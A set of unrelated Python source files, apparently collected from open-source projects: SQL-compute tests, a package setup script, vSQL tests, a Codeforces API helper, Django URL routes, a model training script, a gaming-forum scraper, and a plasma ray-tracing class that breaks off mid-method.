sa.Column('y', sa.Integer),
sa.Column('z', sa.Integer))
rhs = sa.Table('bbb', metadata,
sa.Column('w', sa.Integer),
sa.Column('x', sa.Integer),
sa.Column('y', sa.Integer))
L = TableSymbol('L', '{x: int, y: int, z: int}')
R = TableSymbol('R', '{w: int, x: int, y: int}')
joined = join(L, R, ['x', 'y'])
expected = lhs.join(rhs, (lhs.c.x == rhs.c.x)
& (lhs.c.y == rhs.c.y))
expected = select(list(unique(expected.columns, key=lambda c:
c.name))).select_from(expected)
result = compute(joined, {L: lhs, R: rhs})
assert str(result) == str(expected)
assert str(select(result)) == str(select(expected))
# Schemas match
print(result.c.keys())
print(joined.columns)
assert list(result.c.keys()) == list(joined.columns)
def test_unary_op():
assert str(compute(exp(t['amount']), s)) == str(sa.func.exp(s.c.amount))
def test_unary_op():
assert str(compute(-t['amount'], s)) == str(-s.c.amount)
def test_reductions():
assert str(compute(sum(t['amount']), s)) == \
str(sa.sql.functions.sum(s.c.amount))
assert str(compute(mean(t['amount']), s)) == \
str(sa.sql.func.avg(s.c.amount))
assert str(compute(count(t['amount']), s)) == \
str(sa.sql.func.count(s.c.amount))
assert 'amount_sum' == compute(sum(t['amount']), s).name
def test_distinct():
result = str(compute(Distinct(t['amount']), s))
assert 'distinct' in result.lower()
assert 'amount' in result.lower()
print(result)
assert result == str(sa.distinct(s.c.amount))
def test_nunique():
result = str(computefull(nunique(t['amount']), s))
print(result)
assert 'distinct' in result.lower()
assert 'count' in result.lower()
assert 'amount' in result.lower()
@xfail(reason="Fails because SQLAlchemy doesn't seem to know binary reductions")
def test_binary_reductions():
assert str(compute(any(t['amount'] > 150), s)) == \
str(sqlalchemy.sql.functions.any(s.c.amount > 150))
def test_by():
expr = by(t, t['name'], t['amount'].sum())
result = compute(expr, s)
expected = sa.select([s.c.name,
sa.sql.functions.sum(s.c.amount).label('amount_sum')]
).group_by(s.c.name)
assert str(result) == str(expected)
def test_by_head():
t2 = t.head(100)
expr = by(t2, t2['name'], t2['amount'].sum())
result = compute(expr, s)
s2 = select(s).limit(100)
expected = sa.select([s2.c.name,
sa.sql.functions.sum(s2.c.amount).label('amount_sum')]
).group_by(s2.c.name)
assert str(result) == str(expected)
def test_by_two():
expr = by(tbig, tbig[['name', 'sex']], tbig['amount'].sum())
result = compute(expr, sbig)
expected = (sa.select([sbig.c.name,
sbig.c.sex,
sa.sql.functions.sum(sbig.c.amount).label('amount_sum')])
.group_by(sbig.c.name, sbig.c.sex))
assert str(result) == str(expected)
def test_by_three():
result = compute(by(tbig,
tbig[['name', 'sex']],
(tbig['id'] + tbig['amount']).sum()),
sbig)
expected = (sa.select([sbig.c.name,
sbig.c.sex,
sa.sql.functions.sum(sbig.c.id+ sbig.c.amount)])
.group_by(sbig.c.name, sbig.c.sex))
assert str(result) == str(expected)
def test_join_projection():
metadata = sa.MetaData()
lhs = sa.Table('amounts', metadata,
sa.Column('name', sa.String),
sa.Column('amount', sa.Integer))
rhs = sa.Table('ids', metadata,
sa.Column('name', sa.String),
sa.Column('id', sa.Integer))
L = TableSymbol('L', '{name: string, amount: int}')
R = TableSymbol('R', '{name: string, id: int}')
want = join(L, R, 'name')[['amount', 'id']]
result = compute(want, {L: lhs, R: rhs})
print(result)
assert 'join' in str(result).lower()
assert result.c.keys() == ['amount', 'id']
assert 'amounts.name = ids.name' in str(result)
def test_sort():
assert str(compute(t.sort('amount'), s)) == \
str(select(s).order_by(s.c.amount))
assert str(compute(t.sort('amount', ascending=False), s)) == \
str(select(s).order_by(sqlalchemy.desc(s.c.amount)))
def test_head():
assert str(compute(t.head(2), s)) == str(select(s).limit(2))
def test_label():
assert str(compute((t['amount'] * 10).label('foo'), s)) == \
str((s.c.amount * 10).label('foo'))
def test_relabel():
result = compute(t.relabel({'name': 'NAME', 'id': 'ID'}), s)
expected = select([s.c.name.label('NAME'), s.c.amount, s.c.id.label('ID')])
assert str(result) == str(expected)
def test_merge():
col = (t['amount'] * 2).label('new')
expr = merge(t['name'], col)
result = str(compute(expr, s))
assert 'amount * ' in result
assert 'FROM accounts' in result
assert 'SELECT accounts.name' in result
assert 'new' in result
def test_projection_of_selection():
print(compute(t[t['amount'] < 0][['name', 'amount']], s))
assert len(str(compute(t[t['amount'] < 0], s))) > \
len(str(compute(t[t['amount'] < 0][['name', 'amount']], s)))
def test_union():
ts = [TableSymbol('t_%d' % i, '{name: string, amount: int, id: int}')
for i in [1, 2, 3]]
ss = [sa.Table('accounts_%d' % i, metadata,
sa.Column('name', sa.String),
sa.Column('amount', sa.Integer),
sa.Column('id', sa.Integer, primary_key=True)) for i in [1, 2, 3]]
expr = union(*ts)
result = str(select(compute(expr, dict(zip(ts, ss)))))
assert "SELECT name, amount, id" in str(result)
assert "accounts_1 UNION accounts_2 UNION accounts_3" in str(result)
def test_outer_join():
L = TableSymbol('L', '{id: int, name: string, amount: real}')
R = TableSymbol('R', '{city: string, id: int}')
from blaze.sql import SQL
engine = sa.create_engine('sqlite:///:memory:')
_left = [(1, 'Alice', 100),
(2, 'Bob', 200),
(4, 'Dennis', 400)]
left = SQL(engine, 'left', schema=L.schema)
left.extend(_left)
_right = [('NYC', 1),
('Boston', 1),
('LA', 3),
('Moscow', 4)]
right = SQL(engine, 'right', schema=R.schema)
right.extend(_right)
conn = engine.connect()
query = compute(join(L, R, how='inner'), {L: left.table, R: right.table})
result = list(map(tuple, conn.execute(query).fetchall()))
assert set(result) == set(
[(1, 'Alice', 100, 'NYC'),
(1, 'Alice', 100, 'Boston'),
(4, 'Dennis', 400, 'Moscow')])
query = compute(join(L, R, how='left'), {L: left.table, R: right.table})
result = list(map(tuple, conn.execute(query).fetchall()))
assert set(result) == set(
[(1, 'Alice', 100, 'NYC'),
(1, 'Alice', 100, 'Boston'),
(2, 'Bob', 200, None),
(4, 'Dennis', 400, 'Moscow')])
query = compute(join(L, R, how='right'), {L: left.table, R: right.table})
print(query)
result = list(map(tuple, conn.execute(query).fetchall()))
print(result)
assert set(result) == set(
[(1, 'Alice', 100, 'NYC'),
(1, 'Alice', 100, 'Boston'),
(3, None, None, 'LA'),
(4, 'Dennis', 400, 'Moscow')])
# SQLAlchemy doesn't support full outer join
"""
query = compute(join(L, R, how='outer'), {L: left.table, R: right.table})
result = list(map(tuple, conn.execute(query).fetchall()))
assert set(result) == set(
[(1, 'Alice', 100, 'NYC'),
(1, 'Alice', 100, 'Boston'),
(2, 'Bob', 200, None),
(3, None, None, 'LA'),
(4, 'Dennis', 400, 'Moscow')])
"""
conn.close()
def test_summary():
expr = summary(a=t.amount.sum(), b=t.id.count())
result = str(compute(expr, s))
assert 'sum(accounts.amount) as a' in result.lower()
assert 'count(accounts.id) as b' in result.lower()
def test_summary_by():
expr = by(t, t.name, summary(a=t.amount.sum(), b=t.id.count()))
result = str(compute(expr, s))
assert 'sum(accounts.amount) as a' in result.lower()
assert 'count(accounts.id) as b' in result.lower()
assert 'group by accounts.name' in result.lower()
|
from setuptools import setup, find_packages, Command
from os import path
from io import open
import shutil
__CWD = path.abspath(path.dirname(__file__))
with open(path.join(__CWD, 'README.md'), encoding='utf-8') as fstream:
long_description = fstream.read()
pkgversion = '4.0.1'
class Clean(Command):
user_options = []
def initialize_options(self):
pass
def finalize_options(self):
pass
def run(self):
for d in [
'build',
'dist',
'lensesio.egg-info',
'lensesio/__pycache__',
'lensesio/data/__pycache__',
'lensesio/flows/__pycache__',
'lensesio/kafka/__pycache__',
'lensesio/core/__pycache__',
'lensesio/registry/__pycache__',
'.tox',
'venv',
'.pytest_cache',
]:
try:
if path.exists(d):
shutil.rmtree(d)
print("Deleted %s" % d)
except OSError:
print("Error while trying to delete %s" % d)
setup(
name='lensesio',
version=pkgversion,
description='Lenses Python Client',
long_descripion=long_description,
long_description_content_type="text/markdown",
url='https://github.com/Landoop/lenses-python',
author='Lenses.io LTD',
author_email='info@lenses.io',
license='Apache License 2.0',
classifiers=[
'Intended Audience :: System Administrators',
'Topic :: Software Development',
'License :: OSI Approved :: Apache Software License',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
],
keywords='lensesio kafka_integration',
project_urls={
'Documentation': 'https://docs.lenses.io/2.3/dev/python-lib/',
'HomePage': 'https://github.com/lensesio/lenses-python',
},
package_dir={'': '.'},
py_modules=['kafka'],
packages=find_packages(
include=[
'lensesio',
'lensesio.core',
'lensesio.kafka',
'lensesio.flows',
'lensesio.registry',
'lensesio.data',
'lensesio.pulsar'
],
exclude=[]
),
python_requires='>=3',
install_requires=[
'requests==2.25.1',
'websocket-client==0.56.0',
],
extras_require={
'kerberos': [
'kerberos==1.3.0',
],
'pulsar': [
'pulsar-client==2.5.1',
],
'full': [
'pulsar-client==2.5.1',
'kerberos==1.3.0',
],
},
cmdclass={
'clean': Clean,
},
)
|
"""
Tests for the vSQL unary logical "not" operator ``not``.
The test are done via the Python DB interface.
To run the tests, :mod:`pytest` is required.
"""
from conftest import *
###
### Tests
###
def test_bool1(config_persons):
check_vsql(config_persons, "repr(not app.p_bool_none.value) == 'True'")
def test_bool2(config_persons):
check_vsql(config_persons, "repr(not app.p_bool_false.value) == 'True'")
def test_bool3(config_persons):
check_vsql(config_persons, "repr(not app.p_bool_true.value) == 'False'")
def test_int1(config_persons):
check_vsql(config_persons, "repr(not app.p_int_none.value) == 'True'")
def test_int2(config_persons):
check_vsql(config_persons, "repr(not app.p_int_value.value) == 'False'")
def test_number1(config_persons):
check_vsql(config_persons, "repr(not app.p_number_none.value) == 'True'")
def test_number2(config_persons):
check_vsql(config_persons, "repr(not app.p_number_value.value) == 'False'")
def test_str1(config_persons):
check_vsql(config_persons, "repr(not app.p_str_none.value) == 'True'")
def test_str2(config_persons):
check_vsql(config_persons, "repr(not app.p_str_value.value) == 'False'")
def test_date1(config_persons):
check_vsql(config_persons, "repr(not app.p_date_none.value) == 'True'")
def test_date2(config_persons):
check_vsql(config_persons, "repr(not app.p_date_value.value) == 'False'")
def test_datetime1(config_persons):
check_vsql(config_persons, "repr(not app.p_datetime_none.value) == 'True'")
def test_datetime2(config_persons):
check_vsql(config_persons, "repr(not app.p_datetime_value.value) == 'False'")
def test_datedelta1(config_persons):
check_vsql(config_persons, "repr(not app.p_datedelta_none.value) == 'True'")
def test_datedelta2(config_persons):
check_vsql(config_persons, "repr(not app.p_datedelta_value.value) == 'False'")
def test_datetimedelta1(config_persons):
check_vsql(config_persons, "repr(not app.p_datetimedelta_none.value) == 'True'")
def test_datetimedelta2(config_persons):
check_vsql(config_persons, "repr(not app.p_datetimedelta_value.value) == 'False'")
def test_monthdelta1(config_persons):
check_vsql(config_persons, "repr(not app.p_monthdelta_none.value) == 'True'")
def test_monthdelta2(config_persons):
check_vsql(config_persons, "repr(not app.p_monthdelta_value.value) == 'False'")
def test_color1(config_persons):
check_vsql(config_persons, "repr(not app.p_color_none.value) == 'True'")
def test_color2(config_persons):
check_vsql(config_persons, "repr(not app.p_color_value.value) == 'False'")
def test_geo(config_persons):
check_vsql(config_persons, "repr(not geo(49, 11, 'Here')) == 'False'")
|
import json
import pathlib
from time import time
from urllib.parse import urlencode
from hashlib import sha512, md5
def call_api(parent, endpoint='contest.status', data=None, cache_file=None, cache_time=None):
"""
:param cache_time: TTL of cache (in seconds)
:param cache_file: set cache file e.g. status.json
:param data: other data to send
:param endpoint: API endpoint
:param parent: instance of **Codeforces**
"""
f = None
if parent.cache: # 如果要cache
pathlib.Path('cache/').mkdir(parents=True, exist_ok=True)
if cache_file is not None: # 如果有限定 cache file
f = pathlib.Path(f'cache/{cache_file}.json')
elif data is not None: # 沒限定,自己生
f = pathlib.Path(f'cache/{endpoint}-{md5(json.dumps(data, sort_keys=True).encode("utf-8")).hexdigest()[:5]}.json')
else: # 什麼都沒限定,用endpoint
f = pathlib.Path(f'cache/{endpoint}')
if f.exists() and f.stat().st_size != 0 and int(time()) - int(
f.stat().st_mtime) < (cache_time or 3 * 60):
return json.load(f.open('r'))
# cache 不適用
default_data = {
'apiKey': parent.apiKey,
'time': int(time())
}
if data is None:
data = {}
# merge two dict
final_data = {**data, **default_data}
post_data = urlencode([(k,final_data[k]) for k in sorted(final_data.keys())])
# print(post_data)
api_sig = sha512(f'123456/{endpoint}?{post_data}#{parent.secret}'.encode()).hexdigest()
res = parent.session.get(f'https://codeforces.com/api/{endpoint}?{post_data}',
params={'apiSig': '123456' + api_sig})
api_json = json.loads(res.text)
if api_json['status'] == 'FAILED':
# print(api_json['comment'])
from CodeforcesAPI.Exceptions import CodeforcesCredentialException
raise CodeforcesCredentialException(message=api_json['comment'])
if parent.cache: # 如果要cache
json.dump(api_json['result'], f.open('w+'))
return api_json['result']
|
# -*- coding:utf-8 -*-
# Copyright 2014, Rackspace, US, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from django.conf.urls import url
from account.views import AccountRoleViews, AccountRoleListViews
from django.views.decorators.cache import cache_page
urlpatterns = [
# enterprise info
url(r'^role_create', AccountRoleViews.as_view({"post": "role_create"}), name='role_create'),
url(r'^role_update', AccountRoleViews.as_view({"post": "role_update"}), name='role_update'),
url(r'^role_delete', AccountRoleViews.as_view({"post": "role_delete"}), name='role_delete'),
url(r'^query_all_role_info',
AccountRoleViews.as_view({"get": "query_all_role_info"}),
name='query_all_role_info'),
# restful
url(r'^role', AccountRoleListViews.as_view()),
]
|
import hydra
from omegaconf import DictConfig, OmegaConf
from spike.source.model import BasicNet
from spike.source.data import ESDDataModule
from spike.source.utils import set_up_neptune, get_neptune_params, get_default_callbacks
import torch
import pytorch_lightning as pl
pl.seed_everything(23)
def train(FLAGS):
print(OmegaConf.to_yaml(FLAGS))
# ------------
# LR FINDER:
# ------------
datamodule = ESDDataModule(**FLAGS.experiment)
datamodule.prepare_data()
datamodule.setup("fit")
model = BasicNet(**FLAGS.experiment, loss_fn=torch.nn.BCELoss)
trainer = pl.Trainer(**FLAGS.trainer)
lr = trainer.tuner.lr_find(model, datamodule, num_training=500).suggestion()
if lr > 0.1:
lr = FLAGS.optimizer_kwargs["lr"]
print(f"LR to high -> Corrected to {lr}")
if lr < 0.00001:
lr = FLAGS.optimizer_kwargs["lr"]
print(f"LR to low -> Corrected to {lr}")
print(f"Best Learning Rate: {lr}")
FLAGS.optimizer_kwargs["lr"] = lr
# ------------
# data
# ------------
datamodule = ESDDataModule(**FLAGS.experiment)
datamodule.prepare_data()
datamodule.setup("fit")
# ------------
# model
# ------------
model = BasicNet(**FLAGS.experiment, loss_fn=torch.nn.BCELoss)
# ------------
# training
# ------------
callbacks = get_default_callbacks(monitor='val_loss', mode='min', early_stop=False)
trainer = pl.Trainer(**FLAGS.trainer,
callbacks=callbacks,
logger=set_up_neptune(**get_neptune_params(FLAGS, callbacks)))
trainer.fit(model, datamodule)
# ------------
# testing
# ------------
result = trainer.test()
print(result)
@hydra.main(config_path='./source/config/', config_name="spike.yml")
def main(FLAGS: DictConfig):
OmegaConf.set_struct(FLAGS, False)
return train(FLAGS)
if __name__ == '__main__':
main()
|
#!/usr/bin/env python3
""" A 巴哈姆特(https://forum.gamer.com.tw/) post library for python.
For more documentation, see README.md . """
import requests
import urllib.parse as urlparse
from bs4 import BeautifulSoup
import re
REQHEADERS = {"User-Agent": ("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 "
"(KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36")}
REQCOOKIES = {}
def from_url(inurl):
""" Initiates a bpl object (BahaPost or Floor) with an URL """
parsed = urlparse.urlparse(inurl)
params = dict(urlparse.parse_qsl(parsed.query))
if (parsed.scheme == "http" and
parsed.netloc == "forum.gamer.com.tw" and
parsed.path == "/C.php" and
all(x in params for x in ["bsn", "snA"])):
return BahaPost(params["bsn"], params["snA"])
elif (parsed.scheme == "http" and
parsed.netloc == "forum.gamer.com.tw" and
parsed.path == "/Co.php" and
all(x in params for x in ["bsn", "sn"])):
return Floor(params["bsn"], params["sn"])
else:
raise ValueError("Input is not a vaild bahaurl.")
def set_cookies(bahaid, baharune):
""" Set baha cookies into global const. """
global REQCOOKIES
if len(baharune) == 84:
REQCOOKIES = {"BAHAID": bahaid, "BAHARUNE": baharune}
else:
raise ValueError('Input is not a vaild baharune.')
return None
class BahaPost:
""" An object class used to describe a baha post. """
def __init__(self, bsn, sna):
""" Initiates a BahaPost object """
self.bsn = bsn
self.sna = sna
self.url = ("http://forum.gamer.com.tw/C.php?" +
"bsn=" + str(self.bsn) + "&" + "snA=" + str(self.sna))
@property
def floors_snb(self):
""" snb list of the BahaPost """
ret = []
soup = BeautifulSoup(
requests.get("http://forum.gamer.com.tw/C.php",
params={"bsn": self.bsn, "snA": self.sna},
headers=REQHEADERS,
cookies=REQCOOKIES).text
)
for gpword in soup("a", {"class": "GPword"}):
ret.append(
re.search(r'upgp_(\d+)', gpword.attrs["id"]).group(1))
return ret
@property
def floors(self):
""" Floor object list of the BahaPost """
ret = []
for snb in self.floors_snb:
ret.append(
Floor(self.bsn, snb))
return ret
@property
def content(self):
""" The content of the main floor
An alias for html
"""
return self.floors[0].html
@property
def html(self):
""" The content of the main floor in HTML """
return self.floors[0].get_content(baha_code=False, prettify=True)
@property
def baha_code(self):
""" The content of the main floor in baha_code, from /post1.php
Requies vaild BAHARUNE and BAHAID cookies."""
return self.floors[0].get_content(baha_code=True, prettify=False)
@property
def comments(self):
""" The comment of the main floor """
return self.floors[0].comments
class Floor:
""" An object class used to describe floors of baha posts """
def __init__(self, bsn, snb):
""" Initiates a floor object """
self.bsn = str(bsn)
self.snb = str(snb)
soup = BeautifulSoup(requests.get("http://forum.gamer.com.tw/Co.php",
params={"bsn": bsn, "sn": snb},
headers=REQHEADERS,
cookies=REQCOOKIES).text)
for p_item in soup(id="BH-master")[0]("p", {"class": "FM-lbox1"}):
parsed = urlparse.urlparse(p_item.a.attrs["href"])
params_ = dict(urlparse.parse_qsl(parsed.query))
if parsed.path == 'switch.php' and "bsn" in params_:
self.sna = params_["snA"]
break
@property
def content(self):
""" The floor's content in html
An alias for html """
return self.html
@property
def html(self):
""" The floor's content in baha_code, from /Co.php """
return self.get_content(baha_code=False, prettify=True)
@property
def baha_code(self):
""" The floor's content in baha_code, from /post1.php
Requies vaild BAHARUNE and BAHAID cookies. """
return self.get_content(baha_code=True, prettify=False)
def get_content(self, baha_code=False, prettify=True):
""" Retrieve content of a floor
@param bool baha_code Outputs baha_code from /post1.php when this is set to True,
If not, Output HTML from /Co.php .
@param bool prettify Outputs prettified HTML by BeautifulSoup if is set.
"""
if baha_code and not prettify:
try:
response = requests.get("http://forum.gamer.com.tw/post1.php",
params={"bsn": self.bsn,
"snA": self.sna,
"sn": self.snb,
"type": "2", "re": "1"},
headers=REQHEADERS,
cookies=REQCOOKIES)
response.encoding = 'utf8'
soup = BeautifulSoup(response.text)
return re.search(r"^,bahacode:true,content:'([^']*?)'",
str(soup(id="form1")[0].find_all("script")),
flags=re.MULTILINE).group(1)
except IndexError:
raise Exception('Not authencated.'
' Set cookies by bpl.set_cookies(BAHAID, BAHARUNE) .')
elif baha_code and prettify:
raise ValueError('baha_code and prettify can\'t be true at the same time')
else:
try:
response = requests.get("http://forum.gamer.com.tw/Co.php",
params={"bsn": self.bsn, "sn": self.snb},
headers=REQHEADERS,
cookies=REQCOOKIES)
response.encoding = 'utf8'
soup = BeautifulSoup(response.text)
text = soup(id=("cf" + self.snb))[0]
return text.prettify() if prettify else text.text
except IndexError:
raise Exception('Not found. '
'The floor is probably deleted or requires authentication. '
'Try retrieving baha_code instead.')
@property
def comments(self):
""" The comments of each floors """
response = requests.get("http://forum.gamer.com.tw/ajax/moreCommend.php",
params={"bsn": self.bsn, "snB": self.snb},
headers=REQHEADERS,
cookies=REQCOOKIES)
response.encoding = 'utf8'
restext = re.sub(r'<!\[CDATA\[(.+?)\]\]', r'\1', response.text)
soup = BeautifulSoup(restext)
ret = []
for msg in soup("msg")[::-1]:
msg_ret = []
for msg_item in msg(True):
msg_ret.append({msg_item.name: msg_item.text})
ret.append(msg_ret)
return ret
|
# -*- coding: utf-8 -*-
"""
.. Authors
Novimir Pablant <npablant@pppl.gov>
James Kring <jdk0026@tigermail.auburn.edu>
Yevgeniy Yakusevich <eugenethree@gmail.com>
Contains the XicsrtPlasmaGeneric class.
"""
import logging
import numpy as np
from xicsrt.util import profiler
from xicsrt.tools import xicsrt_spread
from xicsrt.tools.xicsrt_doc import dochelper
from xicsrt.objects._GeometryObject import GeometryObject
from xicsrt.sources._XicsrtSourceFocused import XicsrtSourceFocused
@dochelper
class XicsrtPlasmaGeneric(GeometryObject):
"""
A generic plasma object.
Plasma object will generate a set of ray bundles where each ray bundle
has the properties of the plasma at one particular real-space point.
Each bundle is modeled by a SourceFocused object.
.. Note::
If a `voxel` type bundle is used rays may be generated outside of the
defined plasma volume (as defined by xsize, ysize and zsize). The bundle
*centers* are randomly distributed throughout the plasma volume, but this
means that if a bundle is (randomly) placed near the edges of the plasma
then the bundle voxel volume may extend past the plasma boundary. This
behavior is expected. If it is important to have a sharp plasma boundary
then consider using the 'point' bundle_type instead.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.filter_objects = []
def default_config(self):
"""
xsize
The size of this element along the xaxis direction.
ysize
The size of this element along the yaxis direction.
zsize
The size of this element along the zaxis direction.
angular_dist : string ('isotropic')
The type of angular distribution to use for the emitted rays.
Available distributions: 'isotropic', 'isotropic_xy', 'flat',
'flat_xy', 'gaussian', and 'gaussian_flat'.
See `XicsrtSourceGeneric` for documentation of each distribution.
Warning: Only the 'isotropic' distribution is currently supported!
spread: float (None) [radians]
The angular spread for the emission cone. The spread defines the
half-angle of the cone. See 'angular_dist' in :any:`XicsrtSourceGeneric`
for detailed documentation.
spread_radius: float (None) [meters]
If specified, the spread will be calculated for each bundle such that
the spotsize at the target matches the given radius. This is useful
when working with very extended plasma sources.
This options is incompatible with 'spread'.
use_poisson
No documentation yet. Please help improve XICSRT!
wavelength_dist : string ('voigt')
No documentation yet. Please help improve XICSRT!
wavelength : float (1.0) [Angstroms]
No documentation yet. Please help improve XICSRT!
mass_number : float (1.0) [au]
No documentation yet. Please help improve XICSRT!
linewidth : float (0.0) [1/s]
No documentation yet. Please help improve XICSRT!
emissivity : float (0.0) [ph/m^3]
No documentation yet. Please help improve XICSRT!
temperature : float (0.0) [eV]
No documentation yet. Please help improve XICSRT!
velocity : float (0.0) [m/s]
No documentation yet. Please help improve XICSRT!
time_resolution : float (1e-3) [s]
No documentation yet. Please help improve XICSRT!
bundle_type : string ('voxel')
Define how the origin of rays within the bundle should be distributed.
Available options are: 'voxel' or 'point'.
bundle_volume : float (1e-3) [m^3]
The volume in which the rays within the bundle should distributed.
if bundle_type is 'point' this will not affect the distribution,
though it will still affect the number of bundles if bundle_count
is set to None.
bundle_count : int (None)
The number of bundles to generate. If set to `None` then this number
will be automatically determined by volume/bundle_volume. This default
means that each bundle represents exactly the given `bundle_volume` in
the plasma. For high quality raytracing studies this value should
generally be set to a value much larger than volume/bundle_volume!
max_rays : int (1e7)
No documentation yet. Please help improve XICSRT!
max_bundles : int (1e7)
No documentation yet. Please help improve XICSRT!
filters
No documentation yet. Please help improve XICSRT!
"""
config = super().default_config()
config['xsize'] = 0.0
config['ysize'] = 0.0
config['zsize'] = 0.0
config['angular_dist'] = 'isotropic'
config['spread'] = None
config['spread_radius'] = None
config['target'] = None
config['use_poisson'] = False
config['wavelength_dist'] = 'voigt'
config['wavelength'] = 1.0
config['wavelength_range'] = None
config['mass_number'] = 1.0
config['linewidth'] = 0.0
config['emissivity'] = 0.0
config['temperature'] = 0.0
config['velocity'] = 0.0
config['time_resolution'] = 1e-3
config['bundle_type'] = 'voxel'
config['bundle_volume'] = 1e-6
config['bundle_count'] = None
config['max_rays'] = int(1e7)
config['max_bundles'] = int(1e7)
config['filters'] = []
return config
def initialize(self):
super().initialize()
self.param['max_rays'] = int(self.param['max_rays'])
self.param['volume'] = self.config['xsize'] * self.config['ysize'] * self.config['zsize']
if self.param['bundle_count'] is None:
self.param['bundle_count'] = self.param['volume']/self.param['bundle_volume']
self.param['bundle_count'] = int(np.round(self.param['bundle_count']))
if self.param['bundle_count'] < 1:
raise Exception(f'Bundle volume is larger than the plasma volume.')
if self.param['bundle_count'] > self.param['max_bundles']:
raise ValueError(
f"Current settings will produce too many bundles ({self.param['bundle_count']:0.2e}). "
f"Increase the bundle_volume, explicitly set bundle_count or increase max_bundles.")
def setup_bundles(self):
self.log.debug('Starting setup_bundles')
if self.param['bundle_type'] == 'point':
self.param['voxel_size'] = 0.0
elif self.param['bundle_type'] == 'voxel':
self.param['voxel_size'] = self.param['bundle_volume'] ** (1/3)
# These values should be overwritten in a derived class.
bundle_input = {}
bundle_input['origin'] = np.zeros([self.param['bundle_count'], 3], dtype = np.float64)
bundle_input['temperature'] = np.ones([self.param['bundle_count']], dtype = np.float64)
bundle_input['emissivity'] = np.ones([self.param['bundle_count']], dtype = np.float64)
bundle_input['velocity'] = np.zeros([self.param['bundle_count'], 3], dtype = np.float64)
bundle_input['mask'] = np.ones([self.param['bundle_count']], dtype = np.bool)
bundle_input['spread'] = np.zeros([self.param['bundle_count']], dtype = np.float64)
bundle_input['solid_angle'] = np.zeros([self.param['bundle_count']], dtype = np.float64)
# randomly spread the bundles around the plasma box
offset = np.zeros((self.param['bundle_count'], 3))
offset[:,0] = np.random.uniform(-1 * self.param['xsize'] /2, self.param['xsize'] /2, self.param['bundle_count'])
offset[:,1] = np.random.uniform(-1 * self.param['ysize']/2, self.param['ysize']/2, self.param['bundle_count'])
offset[:,2] = np.random.uniform(-1 * self.param['zsize'] /2, self.param['zsize'] /2, self.param['bundle_count'])
bundle_input['origin'][:] = self.point_to_external(offset)
# Setup the bundle spread and solid angle.
bundle_input = self.setup_bundle_spread(bundle_input)
return bundle_input
def setup_bundle_spread(self, bundle_input):
"""
Calculate the spread and solid angle for each bundle.
If the config option 'spread_radius' is provide the spread will be
determined for each bundle by a spotsize at the target.
Note: Even if the idea of a spread radius is added to the generic
source object we still need to calculate and save the results
here so that we can correctly calcuate the bundle intensities.
"""
if self.param['spread_radius'] is not None:
vector = bundle_input['origin'] - self.param['target']
dist = np.linalg.norm(vector, axis=1)
spread = np.arctan(self.param['spread_radius']/dist)
else:
spread = self.param['spread']
bundle_input['spread'][:] = spread
# For the time being the fuction solid_angle is not vectorized, so a
# loop is necessary.
for ii in range(len(bundle_input['spread'])):
bundle_input['solid_angle'][ii] = xicsrt_spread.solid_angle(bundle_input['spread'][ii])
return bundle_input
def get_emissivity(self, rho):
return self.param['emissivity']
def get_temperature(self, rho):
return self.param['temperature']
def get_velocity(self, rho):
return self.param['velocity']
def bundle_generate(self, bundle_input):
self.log.debug('Starting bundle_generate')
return bundle_input
def bundle_filter(self, bundle_input):
self.log.debug('Starting bundle_filter')
for filter in self.filter_objects:
bundle_input = filter.filter(bundle_input)
return bundle_input
def create_sources(self, bundle_input):
"""
Generate rays from a list of bundles.
bundle_input
a list containing dictionaries containing the locations, emissivities,
temperatures and velocitities and of all ray bundles to be emitted.
"""
rays_list = []
count_rays_in_bundle = []
m = bundle_input['mask']
# Check if the number of rays generated will exceed max ray limits.
# This is only approximate since poisson statistics may be in use.
predicted_rays = int(np.sum(
bundle_input['emissivity'][m]
* self.param['time_resolution']
* self.param['bundle_volume']
* bundle_input['solid_angle'][m] / (4 * np.pi)
* self.param['volume']
/ (self.param['bundle_count'] * self.param['bundle_volume'])))
self.log.debug(f'Predicted rays: {predicted_rays:0.2e}')
if predicted_rays > self.param['max_rays']:
raise ValueError(
f"Current settings will produce too many rays ({predicted_rays:0.2e}). "
f"Please reduce integration time or adjust other parameters.")
# Bundle generation loop
for ii in range(self.param['bundle_count']):
if not bundle_input['mask'][ii]:
continue
profiler.start("Ray Bundle Generation")
source_config = dict()
# Specially dependent parameters
source_config['origin'] = bundle_input['origin'][ii]
source_config['temperature'] = bundle_input['temperature'][ii]
source_config['velocity'] = bundle_input['velocity'][ii]
source_config['spread'] = bundle_input['spread'][ii]
# Calculate the total number of photons to launch from this bundle
# volume. Since the source can use poisson statistics, this should
# be of floating point type.
intensity = (bundle_input['emissivity'][ii]
* self.param['time_resolution']
* self.param['bundle_volume']
* bundle_input['solid_angle'][ii] / (4 * np.pi))
# Scale the number of photons based on the number of bundles.
#
# Ultimately we allow bundle_volume and bundle_count to be
# independent, which means that a bundle representing a volume in
# the plasma can be launched from virtual volume of a different
# size.
#
# In order to allow this while maintaining overall photon statistics
# from the plasma, we normalize the intensity so that each bundle
# represents a volume of plasma_volume/bundle_count.
#
# In doing so bundle_volume cancels out, but I am leaving the
# calculation separate for clarity.
intensity *= self.param['volume'] / (self.param['bundle_count'] * self.param['bundle_volume'])
source_config['intensity'] = intensity
# constants
source_config['xsize'] = self.param['voxel_size']
source_config['ysize'] = self.param['voxel_size']
source_config['zsize'] = self.param['voxel_size']
source_config['zaxis'] = self.param['zaxis']
source_config['xaxis'] = self.param['xaxis']
source_config['target'] = self.param['target']
source_config['mass_number'] = self.param['mass_number']
source_config['wavelength_dist'] = self.param['wavelength_dist']
source_config['wavelength'] = self.param['wavelength']
source_config['wavelength_range'] = self.param['wavelength_range']
source_config['linewidth'] = self.param['linewidth']
source_config['angular_dist'] = self.param['angular_dist']
source_config['use_poisson'] = self.param['use_poisson']
